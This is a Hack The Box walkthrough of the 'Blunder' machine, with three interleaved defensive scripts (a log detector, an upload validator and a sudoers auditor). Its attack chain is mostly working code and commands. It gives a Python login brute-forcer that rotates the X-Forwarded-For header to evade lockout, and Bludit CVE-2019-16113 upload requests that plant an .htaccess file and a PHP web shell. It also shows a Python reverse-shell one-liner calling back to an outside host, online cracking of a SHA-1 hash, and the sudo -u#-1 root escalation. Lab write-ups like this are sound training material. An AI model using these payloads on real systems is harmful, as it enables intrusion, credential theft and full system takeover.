
HTB::Blunder Walkthrough

2020-06-01

0x01 Info Card

0x02 Tools and tips

  • nmap
  • dirsearch
  • wfuzz
  • cewl
  • CMS password leakage
  • sudo -u#-1

0x03 Pentesting

Initial Enumeration

Port scan with nmap:

# Nmap 7.80 scan initiated Sun May 31 19:18:12 2020 as: nmap -sC -sV -Pn -oN nmap.txt blunder.htb
Nmap scan report for blunder.htb (10.10.10.191)
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 31 19:18:52 2020 -- 1 IP address (1 host up) scanned in 40.22 seconds

Directory scan with dirsearch:

$ sudo dirsearch -u http://blunder.htb -e *
Extensions: 46060.txt | HTTP method: get | Threads: 10 | Wordlist size: 6124
Target: http://blunder.htb

[17:25:56] Starting:
[17:25:59] 200 - 7KB - /%3f/
[17:26:07] 200 - 563B - /.gitignore
[17:26:24] 200 - 7KB - /0
[17:26:41] 200 - 3KB - /about
[17:26:49] 301 - 0B - /admin -> http://10.10.10.191/admin/
[17:26:53] 200 - 2KB - /admin/.config
[17:26:53] 200 - 2KB - /admin/
...
...
[17:29:40] 200 - 2KB - /admin/web/
[17:29:40] 200 - 2KB - /admin/login.htm
[17:31:22] 301 - 0B - /domcfg.nsf/?open -> http://10.10.10.191/domcfg.nsf
[17:32:02] 200 - 30B - /install.php
[17:32:14] 200 - 1KB - /LICENSE
[17:33:29] 200 - 3KB - /README.md
[17:33:33] 200 - 22B - /robots.txt

/admin requires a username and password, and neither .gitignore nor robots.txt contains anything exploitable, so the next step is to find credentials for the admin panel.

Use wfuzz to check whether there are any sensitive files under the web root:

$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://blunder.htb/FUZZ.txt" -t 100
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://blunder.htb/FUZZ.txt
Total requests: 4652

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000003513: 200 1 L 4 W 22 Ch "robots"
000004119: 200 4 L 23 W 118 Ch "todo"

Total time: 44.66474
Processed Requests: 4652
Filtered Requests: 4650
Requests/sec.: 104.1537

Contents of todo.txt:

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

A blind guess: fergus is probably the username, so the password is what remains to be found. After most of a day with no progress, and knowing HTB's habits, the password is most likely meant to come from a custom wordlist generated from the site's home page.

$ cewl -w wordlist.txt -d 10 -m 1 http://blunder.htb/

$ wc wordlist.txt
354 354 2459 wordlist.txt

Neither Burp nor wfuzz managed to brute-force it, so the only option was a Python script:

#!/usr/bin/env python3
import re
import requests


def open_resources(file_path):
    # One candidate password per line; strip the trailing newline
    with open(file_path) as fh:
        return [item.rstrip("\n") for item in fh]


host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_resources('/home/Hackthebox/Blunder/wordlist.txt')

for password in wordlist:
    # Fresh session per attempt: the login form issues a new CSRF token each time
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        # A different X-Forwarded-For value on every attempt
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    # Do not follow the redirect: the Location header tells us whether login succeeded
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

The result of the run:

[*] Trying: character
[*] Trying: RolandDeschain
()
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
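From the defender's side, the thing to notice in the script above is that it sends a different X-Forwarded-For value on every attempt, so a login lockout keyed on that header never accumulates. The detector below is an added example (not code from the original post): it keys on the TCP peer address instead and flags a peer that posts many login attempts while claiming many different forwarded addresses. The log format (Apache "combined" with X-Forwarded-For appended) and the sample lines are assumptions constructed for the example.

```python
#!/usr/bin/env python3
"""Spot X-Forwarded-For rotation against a login endpoint (added example)."""
import re
from collections import defaultdict

# Assumed log format (not from the post): Apache "combined" with
# "%{X-Forwarded-For}i" appended as a final quoted field.
LOG_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$'
)
LOGIN_PATH = "/admin/login"

# Constructed sample lines (not captured from the box).  10.10.14.4 rotates the
# header through wordlist entries; 192.0.2.10 sits behind a proxy that sets a
# stable, genuine forwarded address.
SAMPLE_LOG = """\
10.10.14.4 - - [31/May/2020:19:40:01 +0000] "POST /admin/login HTTP/1.1" 200 2457 "http://blunder.htb/admin/login" "Mozilla/5.0" "blunder"
10.10.14.4 - - [31/May/2020:19:40:02 +0000] "POST /admin/login HTTP/1.1" 200 2457 "http://blunder.htb/admin/login" "Mozilla/5.0" "interesting"
10.10.14.4 - - [31/May/2020:19:40:02 +0000] "POST /admin/login HTTP/1.1" 200 2457 "http://blunder.htb/admin/login" "Mozilla/5.0" "facts"
10.10.14.4 - - [31/May/2020:19:40:03 +0000] "POST /admin/login HTTP/1.1" 200 2457 "http://blunder.htb/admin/login" "Mozilla/5.0" "character"
10.10.14.4 - - [31/May/2020:19:40:03 +0000] "POST /admin/login HTTP/1.1" 200 2457 "http://blunder.htb/admin/login" "Mozilla/5.0" "Roland"
10.10.14.4 - - [31/May/2020:19:40:04 +0000] "POST /admin/login HTTP/1.1" 302 - "http://blunder.htb/admin/login" "Mozilla/5.0" "Deschain"
192.0.2.10 - - [31/May/2020:19:41:10 +0000] "GET /admin/login HTTP/1.1" 200 2457 "-" "Mozilla/5.0" "198.51.100.7"
192.0.2.10 - - [31/May/2020:19:41:15 +0000] "POST /admin/login HTTP/1.1" 200 2457 "http://blunder.htb/admin/login" "Mozilla/5.0" "198.51.100.7"
192.0.2.10 - - [31/May/2020:19:41:20 +0000] "POST /admin/login HTTP/1.1" 302 - "http://blunder.htb/admin/login" "Mozilla/5.0" "198.51.100.7"
"""
SAMPLE_LINES = SAMPLE_LOG.splitlines()


def parse(lines):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def login_posts(lines):
    """Only POSTs to the login path count as attempts."""
    return [r for r in parse(lines)
            if r["method"] == "POST" and r["path"] == LOGIN_PATH]


def header_keyed_counts(lines):
    """What a lockout that trusts X-Forwarded-For sees: one attempt per claimed address."""
    counts = defaultdict(int)
    for r in login_posts(lines):
        counts[r["xff"] or r["peer"]] += 1
    return dict(counts)


def peer_rotation_alerts(lines, min_attempts=5, min_distinct_xff=3):
    """Alert on peers with many login POSTs spread over many claimed forwarded addresses."""
    attempts = defaultdict(int)
    claimed = defaultdict(set)
    for r in login_posts(lines):
        attempts[r["peer"]] += 1
        claimed[r["peer"]].add(r["xff"])
    alerts = [
        {"peer": p, "attempts": attempts[p], "distinct_xff": len(claimed[p])}
        for p in attempts
        if attempts[p] >= min_attempts and len(claimed[p]) >= min_distinct_xff
    ]
    return sorted(alerts, key=lambda a: a["peer"])


if __name__ == "__main__":
    print("header-keyed view:", header_keyed_counts(SAMPLE_LINES))
    for alert in peer_rotation_alerts(SAMPLE_LINES):
        print("ALERT X-Forwarded-For rotation:", alert)
```

On the sample, the header-keyed counter never sees more than one failed attempt per claimed address from the brute-forcing peer, while the peer-keyed view reports six attempts across six claimed addresses from one socket. The same rule applies to the application itself: a lockout should key on the socket address, or on X-Forwarded-For only after a trusted reverse proxy has overwritten it.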

Log in to the admin panel as fergus:RolandDeschain:

The site turns out to be built on the open-source Bludit CMS, so a quick Google search for public CVEs:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16113

Following the GitHub link in the References also leads to the author's own account of finding the CVE, and the author, @christa, is Chinese. (For once I didn't have to read the exploitation steps in English 😄)

https://christa.top/details/46/

First, upload an .htaccess file, modifying the request in Burp to bypass the front-end extension check:

POST /admin/ajax/upload-images HTTP/1.1
Host: blunder.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://blunder.htb/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5424398841862763197378512212
Content-Length: 531
Connection: close
Cookie: BLUDITREMEMBERUSERNAME=fergus; BLUDITREMEMBERTOKEN=d08d8cfe8c70b89c242b0a33531998d7; BLUDIT-KEY=dpodie00jad4a6akmo5hookqd2

-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="images[]"; filename=".htaccess"
Content-Type: image/jpeg

RewriteEngine Off
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="uuid"

0fad6e18e5d590f2af2b005ac4f7f80f
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="tokenCSRF"

7ca474f9c654ff0e46761ac0e435423a5a8c012a
-----------------------------5424398841862763197378512212--

Then upload the shell file:

POST /admin/ajax/upload-images HTTP/1.1
Host: blunder.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://blunder.htb/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5424398841862763197378512212
Content-Length: 540
Connection: close
Cookie: BLUDITREMEMBERUSERNAME=fergus; BLUDITREMEMBERTOKEN=d08d8cfe8c70b89c242b0a33531998d7; BLUDIT-KEY=dpodie00jad4a6akmo5hookqd2

-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="images[]"; filename="shell.php"
Content-Type: image/jpeg

GIF89a
<?php system($_GET['cmd']); ?>
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="uuid"

0fad6e18e5d590f2af2b005ac4f7f80f
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="tokenCSRF"

7ca474f9c654ff0e46761ac0e435423a5a8c012a
-----------------------------5424398841862763197378512212--
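Both requests above get past a check that trusts what the client says: ".htaccess" is a dotfile with no extension, and "shell.php" ends in .php but carries a GIF89a header and an image/jpeg Content-Type. The validator below is an added example (not Bludit's code) of the server-side policy that stops both: decide only from an extension allowlist, the leading bytes of the upload and a server-generated filename, and never consult the client's Content-Type. The upload directory and the sample uploads are constructed for the example.

```python
#!/usr/bin/env python3
"""Server-side checks for an image-upload endpoint (added example, not Bludit's code)."""
import os
import secrets

# Allowed extensions and the magic bytes each must start with
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}


def weak_accepts(filename, content_type):
    """Client-trusting check: accepts anything the client declares as an image."""
    return content_type.startswith("image/")


def hardened_validate(filename, data, upload_dir="/var/www/uploads"):
    """Return (accepted, reason, destination_path); upload_dir is an assumed location."""
    base = os.path.basename(filename)                 # drop any path components
    if base.startswith(".") or base.count(".") != 1:  # dotfiles (.htaccess) and a.php.gif
        return False, "dotfile or not exactly one extension", None
    _stem, ext = base.rsplit(".", 1)
    ext = ext.lower()
    if ext not in MAGIC:                              # shell.php: .php is not an image type
        return False, f"extension .{ext} not allowed", None
    if not data.startswith(MAGIC[ext]):               # GIF bytes named .png, empty files
        return False, "content does not match extension", None
    if b"<?php" in data or b"<?=" in data:            # defence in depth against image/PHP polyglots
        return False, "embedded PHP tag", None
    stored = f"{secrets.token_hex(8)}.{ext}"          # never reuse the client's name
    return True, "ok", os.path.join(upload_dir, stored)


# Constructed uploads (name, declared Content-Type, body), not the box's on-disk files
CASES = [
    (".htaccess", "image/jpeg", b"RewriteEngine Off\n"),
    ("shell.php", "image/jpeg", b"GIF89a\n<?php system($_GET['cmd']); ?>\n"),
    ("../../evil.gif", "image/gif", b"GIF89a" + b"\x00" * 16),
    ("logo.gif", "image/gif", b"GIF89a" + b"\x00" * 16),
]


def outcomes(cases=CASES):
    """Compare both policies; returns {filename: (weak_accepted, hardened_accepted)}."""
    return {
        name: (weak_accepts(name, ctype), hardened_validate(name, data)[0])
        for name, ctype, data in cases
    }


if __name__ == "__main__":
    for name, (weak, hard) in outcomes().items():
        print(f"{name:16} weak={weak!s:5} hardened={hard}")
```

The weak policy accepts all four uploads; the hardened one keeps the two genuine GIFs (the traversal prefix is discarded by basename and the file lands under a random name) and rejects the .htaccess and the .php regardless of their declared type. Storing uploads outside any directory where the web server honours .htaccess or executes PHP is the complementary control.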

Start a local listener, then request the shell file from the browser with the cmd parameter below:

http://blunder.htb/bl-content/tmp/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The reverse shell arrives on the local machine:

# kali @ kali in ~/HackTheBox/Blunder [17:25:45] 
$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.191] 59878
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Getting User Access

The next job is to find a username and password for privilege escalation; on an easy box like this they are usually leaked in some file.

After some searching, /var/www holds a second, newer copy of Bludit, and under /var/www/bludit-3.10.0a/bl-content/databases there is a file named users.php:

<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}

There is clearly a password, apparently hashed once; check the hash type with hash-identifier:

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

Least Possible Hashs:
[+] Tiger-160
[+] Haval-160
[+] RipeMD-160
[+] SHA-1(HMAC)
[+] Tiger-160(HMAC)
[+] RipeMD-160(HMAC)
[+] Haval-160(HMAC)
[+] SHA-1(MaNGOS)
[+] SHA-1(MaNGOS2)
[+] sha1($pass.$salt)
[+] sha1($salt.$pass)
[+] sha1($salt.md5($pass))
[+] sha1($salt.md5($pass).$salt)
[+] sha1($salt.sha1($pass))
[+] sha1($salt.sha1($salt.sha1($pass)))
[+] sha1($username.$pass)
[+] sha1($username.$pass.$salt)
[+] sha1(md5($pass))
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)
--------------------------------------------------

Online lookup tool: https://md5decrypt.net/en/Sha1

Entering faca404fd5c0a31cf1897b823c695c85cffeb98d returns the plaintext Password120.

Switch user with su:

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
su hugo
Password: Password120

hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cd
catcd
hugo@blunder:~$ user.txt
cat user.txt
947a-----------------------a7bb

Getting Root Access

Following the usual routine:

hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash

Googling (ALL, !root) /bin/bash turns up the following privilege escalation:

https://www.exploit-db.com/exploits/47502

Very simple, a single command does it:

hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# cd
cd
root@blunder:/# cat /root/root.txt
cat /root/root.txt
b4c0------------------------d45f
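The rule that made this possible, (ALL, !root) /bin/bash, tries to say "any user except root"; the sudoers manual itself warns that '!' negation is not a reliable way to exclude users, and the single command above shows why. The script below is an added example (not from the original post or from the sudo project) that parses sudoers-style user specifications and reports any runas list that relies on negation, so the rule can be rewritten as an explicit allowlist of target users. The sudoers excerpt is constructed; only the hugo line mirrors the box.

```python
#!/usr/bin/env python3
"""Audit sudoers user specifications for negated runas lists (added example)."""
import re

# user  host = (runas_users[:runas_groups])  commands
SPEC_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<cmds>.+)$'
)

# Constructed excerpt; the hugo line matches the rule shown by sudo -l above.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
hugo    ALL=(ALL, !root) /bin/bash
deploy  ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart apache2
alice   ALL=(ALL, !root, !admin) /usr/bin/vim
"""


def parse_specs(text):
    """Return the user specifications in a sudoers text, with their line numbers."""
    specs = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if m:
            spec = m.groupdict()
            spec["lineno"] = lineno
            specs.append(spec)
    return specs


def runas_users(runas):
    """Split the '(users:groups)' list and return the user entries only."""
    users = (runas or "").split(":", 1)[0]
    return [e.strip() for e in users.split(",") if e.strip()]


def find_negated_runas(text):
    """Report every specification whose runas list contains a '!' entry."""
    findings = []
    for spec in parse_specs(text):
        negated = [u for u in runas_users(spec["runas"]) if u.startswith("!")]
        if negated:
            findings.append({
                "lineno": spec["lineno"],
                "user": spec["user"],
                "negated": negated,
                "cmds": spec["cmds"].strip(),
            })
    return findings


if __name__ == "__main__":
    for f in find_negated_runas(SAMPLE_SUDOERS):
        print(f"line {f['lineno']}: {f['user']} may run {f['cmds']} as ALL minus "
              f"{', '.join(f['negated'])}; rewrite the runas list as an explicit allowlist")
```

On the sample, the hugo and alice rules are reported and the root and deploy rules are not. The remediation is to name the intended target account (for example a single unprivileged user) instead of excluding root, and to keep sudo patched: the user-id bypass used above was fixed upstream in sudo 1.8.28.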

Apart from hunting for the password, the rest of this box was fairly easy~~

0x04 Reference

Topic Url
Bludit CVE http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16113
Bludit CVE https://christa.top/details/46/
Sha1 decryption https://md5decrypt.net/en/Sha1
sudo priv https://www.exploit-db.com/exploits/47502
Copyright © ca01h 2019-2021